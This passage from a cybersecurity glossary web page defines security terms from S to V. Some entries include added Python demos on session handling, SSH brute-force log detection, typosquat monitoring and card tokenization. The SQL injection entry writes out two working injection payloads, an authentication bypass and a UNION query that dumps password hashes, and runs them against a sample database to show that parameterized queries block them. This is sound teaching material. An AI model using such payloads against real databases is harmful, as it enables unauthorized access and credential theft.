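    print("old id still valid after login:", store.lookup(pre) is not None)   # False
    clock.advance(20 * 60)
    print("user after 20 idle minutes:", store.lookup(tok))                     # None
```

Two things are easy to get wrong in production: trusting the cookie's own expiry instead of checking timestamps on the server, and rotating the session identifier only on logout rather than at login, which leaves the fixation window open.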

Spear Phishing

Threats & Attacks

Spear Phishing is a targeted form of phishing that crafts personalized messages aimed at specific individuals or organizations, using gathered intelligence to make the attack more convincing and effective.

SQL Injection

Threats & Attacks

SQL Injection is a code injection attack in which attacker-controlled input (form fields, URL parameters, headers, or cookies) is concatenated into an SQL statement, allowing attackers to read, modify, or delete database contents or bypass authentication. The primary defence is parameterized queries (prepared statements) that keep data separate from SQL code, backed by least-privilege database accounts.
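
The vulnerable pattern beside its fix, as an added example (not code from the glossary) run against an in-memory SQLite database with three constructed accounts. Two classic payloads are shown: one that turns a lookup into "return every row", and a UNION that dumps the password-hash column through a query that was only meant to return usernames. The final function covers the case parameters cannot solve: a column name used in ORDER BY has to be validated against an allowlist.

```python
import sqlite3

ALLOWED_SORT_COLUMNS = {"username", "role"}


def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample database (not real accounts or real hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, role, password_hash) VALUES (?, ?, ?)",
        [("alice", "admin", "hash_alice"), ("bob", "user", "hash_bob"), ("carol", "user", "hash_carol")],
    )
    return conn


def find_user_vulnerable(conn, username: str):
    """Vulnerable: string concatenation lets the input rewrite the SQL grammar."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username: str):
    """Fixed: a parameterized query binds the value separately; it can only ever be data."""
    return conn.execute("SELECT username, role FROM users WHERE username = ?", (username,)).fetchall()


def list_users_sorted(conn, column: str):
    """Identifiers (table or column names, ORDER BY targets) cannot be bound as
    parameters, so they are checked against an allowlist before being interpolated."""
    if column not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"sort column not allowed: {column!r}")
    return conn.execute(f"SELECT username, role FROM users ORDER BY {column}").fetchall()


# Classic payloads, constructed for the demonstration.
BYPASS_PAYLOAD = "' OR '1'='1"
DUMP_PAYLOAD = "x' UNION SELECT username, password_hash FROM users --"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, bypass:", find_user_vulnerable(conn, BYPASS_PAYLOAD))   # all three users
    print("safe, bypass:      ", find_user_safe(conn, BYPASS_PAYLOAD))         # []
    print("vulnerable, dump:  ", find_user_vulnerable(conn, DUMP_PAYLOAD))     # usernames + hashes
    print("safe, dump:        ", find_user_safe(conn, DUMP_PAYLOAD))           # []
```

The safe version returns nothing for both payloads because the driver never lets the quote or the UNION reach the parser as SQL; the vulnerable version first returns every account and then leaks the hash column. Escaping quotes by hand is not an alternative: it fails for numeric contexts and for the identifier case handled by the allowlist.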

Supply Chain Attack

Threats & Attacks

A Supply Chain Attack targets an organization by compromising a trusted third-party vendor, software provider, or service in its supply chain, using the trusted relationship to deliver malware or gain unauthorized access.

Spyware

Threats & Attacks

Spyware is malicious software that secretly monitors user activity, collects personal information, and transmits it to third parties without the user's knowledge or consent.

SOC 2

Risk & Compliance

SOC 2 (System and Organization Controls 2) is an auditing framework developed by the AICPA that evaluates an organization's controls against the Trust Services Criteria: security, which every SOC 2 report must cover, plus availability, processing integrity, confidentiality, and privacy as the organization chooses to include. A Type I report assesses control design at a point in time; a Type II report also tests operating effectiveness over a review period.

Security Policy

Risk & Compliance

A Security Policy is a formal document that defines an organization's approach to information security, establishing rules, guidelines, and responsibilities for protecting assets, data, and systems from threats.

Software-Defined Networking (SDN)

Infrastructure

Software-Defined Networking (SDN) is a network architecture approach that separates the control plane from the data plane, enabling centralized, programmable management of network infrastructure through software applications.

Secure File Transfer

Data Protection

Secure File Transfer refers to methods and protocols for transmitting files between systems or users with encryption, authentication, and integrity verification to prevent unauthorized access or tampering during transit.

SOAR

Security Operations

Security Orchestration, Automation, and Response (SOAR) platforms combine incident response, orchestration, automation, and threat intelligence management to help security teams efficiently manage and respond to threats.

Security Operations Center (SOC)

Security Operations

A Security Operations Center (SOC) is a centralized facility staffed with security analysts who continuously monitor, detect, analyze, and respond to cybersecurity incidents using a combination of technology solutions and processes.

Security Awareness Training

Security Operations

Security Awareness Training is an educational program that teaches employees to recognize and respond to cybersecurity threats such as phishing, social engineering, and data handling risks, building a human firewall against attacks.

Shared Responsibility Model

Cloud Security

The Shared Responsibility Model is a cloud security framework that defines which security obligations belong to the cloud service provider and which belong to the customer, varying by service type (IaaS, PaaS, SaaS).

Serverless Security

Cloud Security

Serverless Security addresses the unique security challenges of serverless computing platforms like AWS Lambda and Azure Functions, where the provider manages infrastructure but application-level vulnerabilities remain the customer's responsibility.

Static Application Security Testing (SAST)

Application Security

Static Application Security Testing (SAST) is a white-box testing methodology that analyzes application source code, bytecode, or binaries without executing the program to identify security vulnerabilities early in the development lifecycle.

Software Composition Analysis (SCA)

Application Security

Software Composition Analysis (SCA) is a security practice that identifies open-source components and third-party libraries in applications, detects known vulnerabilities, and ensures license compliance across the software supply chain.

Secure SDLC

Application Security

Secure SDLC (Secure Software Development Lifecycle) is a framework that integrates security activities such as threat modeling, secure coding, security testing, and vulnerability management into every phase of the software development process.

SCADA Security

Emerging Technology

SCADA (Supervisory Control and Data Acquisition) Security addresses the protection of SCADA systems that monitor and control geographically dispersed industrial processes in sectors like utilities, oil and gas, water treatment, and transportation.

Security Information Sharing

Security Operations

Security Information Sharing is the practice of exchanging threat intelligence, indicators of compromise, and security best practices between organizations, industries, and government agencies to improve collective cybersecurity defense.

Security Architecture

Infrastructure

Security Architecture is the design and framework that defines how security controls, technologies, and processes are structured and integrated to protect an organization's information assets and meet business objectives.

Security Orchestration

Security Operations

Security Orchestration is the automated coordination and integration of multiple security tools, processes, and workflows to streamline security operations, accelerate incident response, and reduce manual effort.

Secure Access Service Edge (SASE)

Infrastructure

Secure Access Service Edge (SASE) is a cloud-native architecture that converges networking and security services including SD-WAN, CASB, FWaaS, and ZTNA into a single cloud-delivered platform for secure access from any location.

Security Baseline

Security Operations

A Security Baseline is a minimum set of security controls and configuration standards that must be applied to systems, applications, and networks to ensure a consistent and acceptable level of security across an organization.

Security Audit

Assessment & Testing

A Security Audit is a systematic evaluation of an organization's information security posture by assessing how well it conforms to established security policies, regulatory requirements, and industry best practices.

Secrets Management

Data Protection

Secrets Management is the practice of securely storing, accessing, and managing sensitive credentials such as API keys, passwords, certificates, and tokens used by applications and services in development and production environments.

Secure Web Gateway

Infrastructure

A Secure Web Gateway (SWG) is a security solution that protects users from web-based threats by filtering internet traffic, enforcing corporate policies, blocking malicious websites, and preventing data exfiltration through web channels.

SOX Compliance

Risk & Compliance

Sarbanes-Oxley Act (SOX) compliance requires publicly traded companies to implement and maintain adequate internal controls over financial reporting, including IT general controls that protect financial systems and data integrity.

Service Mesh Security

Cloud Security

Service Mesh Security refers to the protection of inter-service communications within microservices architectures through mutual TLS, fine-grained access policies, traffic encryption, and observability provided by service mesh platforms like Istio and Linkerd.

Security Posture

Risk & Compliance

Security Posture refers to an organization's overall cybersecurity strength and readiness, encompassing the status of its security controls, policies, compliance adherence, vulnerability exposure, and ability to prevent, detect, and respond to threats.

Security Control Framework

Risk & Compliance

A Security Control Framework is a structured set of security controls, guidelines, and best practices that organizations use to design, implement, assess, and improve their security program, such as NIST SP 800-53, CIS Controls, or COBIT.

Shoulder Surfing

Threats & Attacks

Shoulder Surfing is a social engineering technique where an attacker observes a victim's screen or keyboard to gather sensitive information such as passwords, PINs, or confidential data in public or semi-public spaces.

Surveillance Detection

Security Operations

Surveillance Detection is the practice of identifying whether an individual, facility, or operation is being monitored by hostile entities, forming a critical component of executive protection and corporate counterintelligence programs.

Service Account

Identity & Access

A Service Account is a non-human identity used by applications, services, or automated processes to authenticate and access resources. Service accounts often carry elevated privileges, use long-lived credentials, cannot complete MFA, and are rarely reviewed, which makes them attractive targets; they should be inventoried, scoped to the minimum permissions required, rotated, and monitored for interactive logins that a workload would never perform.

Security Operations Metrics

Security Operations

Security Operations Metrics are quantitative measurements used to evaluate the effectiveness, efficiency, and maturity of a security operations program, including detection accuracy (true and false positive rates), response times such as mean time to detect (MTTD) and mean time to respond (MTTR), and control coverage across the asset inventory.

Security Logging

Security Operations

Security Logging is the practice of collecting, storing, and analyzing event records from systems, applications, and networks to detect security incidents, support investigations, and demonstrate compliance. To be usable as evidence, logs need synchronized clocks, forwarding off the originating host so a local attacker cannot erase them, and a defined retention period.
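Detection logic run over log records, as an added example that is not part of the glossary: constructed sshd lines in syslog format are parsed, failed logins are counted per source address in a sliding time window, and a later successful login from a flagged source is reported separately because that is the event an analyst most needs to see. The addresses, users, host name, threshold and window are all invented for the example.

```python
"""Detection over security logs: flag SSH password brute forcing in sample sshd syslog lines (added example)."""
from __future__ import annotations
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sshd lines in syslog format; host, users and addresses are invented
# (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = """\
Mar 12 10:15:01 bastion sshd[2210]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
Mar 12 10:15:03 bastion sshd[2210]: Failed password for root from 203.0.113.7 port 51124 ssh2
Mar 12 10:15:05 bastion sshd[2211]: Failed password for root from 203.0.113.7 port 51130 ssh2
Mar 12 10:15:06 bastion sshd[2212]: Failed password for invalid user test from 203.0.113.7 port 51131 ssh2
Mar 12 10:15:09 bastion sshd[2213]: Failed password for root from 203.0.113.7 port 51140 ssh2
Mar 12 10:15:11 bastion sshd[2214]: Accepted publickey for deploy from 198.51.100.4 port 40010 ssh2
Mar 12 10:16:30 bastion sshd[2215]: Failed password for alice from 198.51.100.9 port 40101 ssh2
Mar 12 10:20:42 bastion sshd[2216]: Accepted password for root from 203.0.113.7 port 51190 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_line(line: str, year: int = 2025) -> dict | None:
    """Parse one sshd line into a dict, or None for lines this detection does not care about.
    Syslog timestamps carry no year, so the caller supplies it."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"], "user": m["user"], "ip": m["ip"]}


def detect_brute_force(lines, threshold: int = 5, window: timedelta = timedelta(minutes=1)) -> list[tuple]:
    """Emit ('brute_force', ip, count) when a source produces >= threshold failed logins inside `window`,
    and ('success_after_brute_force', ip, user) if that source later authenticates successfully."""
    failures: dict[str, list[datetime]] = defaultdict(list)
    flagged: set[str] = set()
    alerts: list[tuple] = []
    for event in filter(None, (parse_line(line) for line in lines)):
        ip = event["ip"]
        if event["result"] == "Failed":
            recent = failures[ip]
            recent.append(event["ts"])
            while recent and event["ts"] - recent[0] > window:  # drop failures outside the sliding window
                recent.pop(0)
            if len(recent) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("brute_force", ip, len(recent)))
        elif ip in flagged:  # an Accepted line from a flagged source: possible successful guess
            alerts.append(("success_after_brute_force", ip, event["user"]))
    return alerts


def run_sample() -> list[tuple]:
    """Run the detection over the constructed sample log."""
    return detect_brute_force(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

The second alert type is the one worth paging on: a burst of failures is noise on any internet-facing host, while a success from the same source after that burst is a likely compromise.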

T
10 terms

Threat Intelligence

Security Operations

Threat intelligence is evidence-based knowledge about existing or emerging threats to an organization's security. It includes context, indicators of compromise (IOCs), and actionable insights that help organizations understand, prevent, and respond to cyber threats.

Typosquatting

Threats & Attacks

Typosquatting is an attack in which an adversary registers domain names (and, in software supply chains, package names) that closely resemble legitimate ones, relying on common typing errors to deliver users to sites or packages under the attacker's control for phishing, malware distribution, or ad fraud.
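One practical defence is to generate the typo variants of your own domain and watch new-registration feeds for them. The code below is an added example, not from the glossary or any monitoring product: it produces single-edit variants (omission, repetition, transposition, adjacent-key substitution and insertion) of a brand label and flags observed domains that match, or that reuse the exact label under another TLD. The adjacency map is a small constructed subset of a QWERTY layout, the domain list is invented, and homoglyph substitutions such as `l` to `1` are deliberately outside what this generator covers.

```python
"""Typosquat detection: generate typo variants of a brand label and flag observed domains that match (added example)."""
from __future__ import annotations

# Constructed adjacency map: a subset of QWERTY neighbours, enough for the sample domains below.
ADJACENT = {
    "a": "qwsz", "e": "wrsd", "i": "uojk", "o": "iplk", "u": "yihj",
    "m": "njk", "n": "bhjm", "l": "kop", "p": "ol", "x": "zsdc",
}


def typo_variants(label: str) -> set[str]:
    """Single-edit variants of a second-level label (no TLD): omission, repetition,
    transposition, adjacent-key substitution and adjacent-key insertion."""
    variants: set[str] = set()
    n = len(label)
    for i in range(n):
        variants.add(label[:i] + label[i + 1:])            # omission:      exmple
        variants.add(label[:i] + label[i] + label[i:])     # repetition:    exaample
        for c in ADJACENT.get(label[i], ""):
            variants.add(label[:i] + c + label[i + 1:])    # substitution:  wxample
            variants.add(label[:i] + c + label[i:])        # insertion:     wexample
    for i in range(n - 1):
        variants.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])  # transposition: exmaple
    variants.discard(label)
    return variants


def split_domain(domain: str) -> tuple[str, str]:
    """Split 'label.tld' into (label, tld). Handles a single-label suffix only, for simplicity."""
    label, _, tld = domain.lower().partition(".")
    return label, tld


def find_typosquats(brand_domain: str, observed: list[str]) -> list[str]:
    """Return observed domains whose label is a typo variant of the brand label,
    or whose label is the brand label itself under a different TLD."""
    brand_label, brand_tld = split_domain(brand_domain)
    variants = typo_variants(brand_label)
    hits = []
    for domain in observed:
        if domain.lower() == brand_domain.lower():
            continue  # the brand's own domain is not a squat
        label, tld = split_domain(domain)
        if label in variants or (label == brand_label and tld != brand_tld):
            hits.append(domain)
    return hits


# Constructed sample: a brand domain and newly registered domains seen in a feed.
BRAND = "example.com"
OBSERVED = ["exmaple.com", "examp1e.com", "exampl.com", "example.co",
            "unrelated.net", "examplee.com", "example.com"]


def scan_sample() -> list[str]:
    """Run the check over the constructed feed."""
    return find_typosquats(BRAND, OBSERVED)


if __name__ == "__main__":
    print(scan_sample())
```

`examp1e.com` is not reported, which is the point of the caveat: a monitoring rule built only from keyboard-distance edits misses homoglyph and visually similar substitutions, so production tooling adds those as a separate variant class.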

Trojan Horse

Threats & Attacks

A Trojan Horse is malware disguised as legitimate software that tricks users into installing it, then provides attackers with unauthorized access to the victim's system for data theft, surveillance, or further attacks.

Third-Party Risk

Risk & Compliance

Third-Party Risk refers to the potential threats and vulnerabilities introduced to an organization through its relationships with external vendors, partners, contractors, and service providers who access its systems or data.

TLS/SSL

Data Protection

TLS (Transport Layer Security) and its predecessor SSL (Secure Sockets Layer) are cryptographic protocols that provide authenticated, encrypted communication over networks, most commonly used to protect web traffic via HTTPS. SSL 2.0 and 3.0 and TLS 1.0 and 1.1 are deprecated; new deployments should require TLS 1.2 or 1.3 and validate server certificates against trusted roots.

Tokenization

Data Protection

Tokenization is a data protection technique that replaces sensitive data elements with non-sensitive placeholder tokens, while the original data is stored securely in a separate token vault with restricted access. Because a vault-issued token is random rather than derived mathematically from the original value, it cannot be reversed without the vault, which removes systems that handle only tokens from the scope of controls such as PCI DSS.
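The mechanism described above, as an added example that is not the glossary's or any vendor's implementation: a vault replaces a card number with a random, format-preserving token, returns the same token for the same input so downstream systems can still join on it, and only allows callers in an approved role to reverse the mapping. The test card number 4111 1111 1111 1111 and the role names are illustrative; the choice to keep the last four digits and to reject Luhn-valid tokens are design decisions of this example.

```python
"""Vault-based tokenization: swap a card number for a random token held in a restricted vault (added example)."""
from __future__ import annotations
import secrets


class Unauthorized(Exception):
    """Raised when a caller without detokenization rights asks for the original value."""


def luhn_valid(number: str) -> bool:
    """Luhn check used by card numbers; the vault uses it to ensure a token never looks like a valid PAN."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


class TokenVault:
    """Holds the token <-> value mapping. Only the listed roles may reverse a token; every other
    component of the system handles tokens only and never sees the original value."""

    def __init__(self, detokenize_roles: set[str]):
        self._by_token: dict[str, str] = {}
        self._by_value: dict[str, str] = {}  # same value -> same token, so tokens stay joinable for analytics
        self._roles = set(detokenize_roles)

    def tokenize(self, pan: str) -> str:
        digits = pan.replace(" ", "")
        if not (digits.isdigit() and 13 <= len(digits) <= 19 and luhn_valid(digits)):
            raise ValueError("input is not a plausible card number")
        if digits in self._by_value:
            return self._by_value[digits]
        while True:
            # Format-preserving: random digits of the same length, last four kept so receipts and
            # support screens can still show "ending in 1111". The rest is random, not derived from the PAN.
            token = "".join(str(secrets.randbelow(10)) for _ in range(len(digits) - 4)) + digits[-4:]
            if token not in self._by_token and not luhn_valid(token):  # never Luhn-valid: cannot pass as a real PAN
                break
        self._by_token[token] = digits
        self._by_value[digits] = token
        return token

    def detokenize(self, token: str, role: str) -> str:
        if role not in self._roles:
            raise Unauthorized(f"role {role!r} is not allowed to detokenize")
        return self._by_token[token]


def demo() -> dict:
    """Constructed walk-through using the well-known test card number 4111 1111 1111 1111."""
    vault = TokenVault(detokenize_roles={"settlement"})
    token = vault.tokenize("4111 1111 1111 1111")
    try:
        vault.detokenize(token, role="web-checkout")
        denied = False
    except Unauthorized:
        denied = True
    return {
        "token": token,
        "denied_for_checkout": denied,
        "settlement_sees": vault.detokenize(token, role="settlement"),
        "stable": vault.tokenize("4111111111111111") == token,
    }


if __name__ == "__main__":
    print(demo())
```

In a real deployment the vault is its own hardened service with encrypted storage and per-caller authentication; the in-memory dictionaries here stand in for that store so the control flow can be read in one place.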

Threat Hunting

Security Operations

Threat Hunting is the proactive practice of searching through networks, endpoints, and datasets to detect and isolate advanced threats that evade existing automated security solutions.

Tabletop Exercise

Security Operations

A Tabletop Exercise is a discussion-based simulation where key stakeholders walk through a hypothetical security incident scenario to evaluate their response plans, identify gaps, and improve coordination without executing actual operations.

Threat Modeling

Assessment & Testing

Threat Modeling is a structured approach for identifying, quantifying, and addressing security threats to a system by analyzing its architecture, data flows, and trust boundaries to proactively design security controls.

Tailgating

Threats & Attacks

Tailgating is a physical security breach where an unauthorized person follows an authorized individual into a restricted area without presenting their own credentials, exploiting social courtesy to bypass access controls.

V
6 terms

Vulnerability Assessment

Assessment & Testing

A vulnerability assessment is a systematic process of identifying, quantifying, and prioritizing security vulnerabilities in systems, networks, and applications. It uses automated scanning tools and manual analysis to discover weaknesses that could be exploited by attackers.

VPN

Infrastructure

A Virtual Private Network (VPN) creates an encrypted tunnel between a user's device and a remote server, protecting data in transit from eavesdropping. VPNs are used to secure remote access to corporate networks and to maintain privacy on public networks. A VPN protects the path, not the endpoint, and internet-facing VPN gateways are frequent targets, so they should be patched promptly and fronted by MFA.

Virus

Threats & Attacks

A Computer Virus is malicious code that attaches itself to legitimate programs or files and replicates when the infected program is executed, spreading to other files and systems while delivering harmful payloads.

Vendor Risk Management

Risk & Compliance

Vendor Risk Management is the process of assessing, monitoring, and mitigating security risks posed by third-party vendors, suppliers, and service providers who have access to an organization's data or systems.

Vulnerability Management

Security Operations

Vulnerability Management is the continuous process of identifying, classifying, prioritizing, remediating, and mitigating security vulnerabilities across an organization's IT infrastructure and applications.

Virtual CISO

Security Operations

A Virtual CISO (vCISO) is an outsourced security leadership service that provides organizations with experienced chief information security officer expertise on a fractional or part-time basis without the cost of a full-time executive.

Understanding Cybersecurity Terminology

Cybersecurity terminology evolves as fast as the threats it describes. Whether you are preparing for a SOC 2 audit, evaluating managed detection and response providers, or building a zero trust architecture, understanding the precise meaning of security terms is essential for making informed decisions.

This glossary covers over 260 definitions across compliance frameworks, threat actor techniques, cloud security controls, identity and access management concepts, and emerging technologies like AI security and quantum computing threats.

Security leaders use consistent definitions to align teams, communicate with boards, evaluate vendors, and satisfy auditors. When everyone agrees on what "least privilege," "SIEM," or "threat hunting" means, security programs run more efficiently and incidents are resolved faster.

For compliance teams, our glossary clarifies the difference between HIPAA security requirements and HITRUST certification, explains PCI DSS levels, and breaks down NIST CSF core functions. For operations teams, it defines SIEM, SOAR, XDR, and MDR capabilities so you can choose the right detection and response strategy.

For executives and boards, understanding terms like cyber resilience, third-party risk, business impact analysis, and cyber insurance enables better governance and risk oversight. For developers and DevOps teams, our application security and DevSecOps definitions support shift-left security practices.

Each term includes practical FAQs written by certified security professionals, related concepts for further reading, and links to relevant GuardsArm services where you can get expert help implementing these concepts in your organization.

Cybersecurity Glossary FAQ

What is a cybersecurity glossary used for?

A cybersecurity glossary helps business leaders, IT teams, auditors, and security practitioners use consistent language when discussing cyber risk, threats, controls, compliance requirements, and response planning.

How often should cybersecurity terminology be reviewed?

Security teams should review key terminology whenever they update policies, run awareness training, prepare for audits, evaluate new tools, or brief executives on changing threat and compliance conditions.

Which cybersecurity terms should executives understand first?

Executives should understand risk assessment, ransomware, incident response, business continuity, data breach notification, Zero Trust, third-party risk, cyber insurance, and compliance frameworks relevant to their industry.

How does GuardsArm choose glossary topics?

The glossary focuses on terms clients frequently encounter during assessments, compliance projects, penetration tests, incident response planning, cloud security reviews, and managed detection programs.

What is the difference between cybersecurity and information security?

Cybersecurity is a subset of information security focused specifically on protecting digital systems, networks, and data from cyber threats. Information security is broader, encompassing the protection of all information assets regardless of format, including physical documents and verbal communications.

What are the most important cybersecurity compliance frameworks in 2025?

The most critical frameworks include SOC 2 for service organizations, ISO 27001 for information security management, NIST CSF for risk management, GDPR for EU data protection, HIPAA for healthcare, PCI DSS for payment data, and CMMC for defense contractors. Organizations often need to comply with multiple frameworks simultaneously.

What does Zero Trust mean in cybersecurity?

Zero Trust is a security framework that requires all users, devices, and applications to be continuously verified before accessing resources, regardless of their network location. The core principle is "never trust, always verify," replacing the traditional perimeter-based security model with identity-centric, least-privilege access controls.

How can a cybersecurity glossary help with SOC 2 audit preparation?

A cybersecurity glossary helps SOC 2 preparation by ensuring all stakeholders use consistent terminology when discussing trust service criteria. It clarifies terms related to access controls, change management, encryption, incident response, and monitoring that auditors will evaluate during the assessment.

Need Expert Help With Cybersecurity?

Our team of certified security professionals can help you implement the right solutions for your organization.

Book a Free Consultation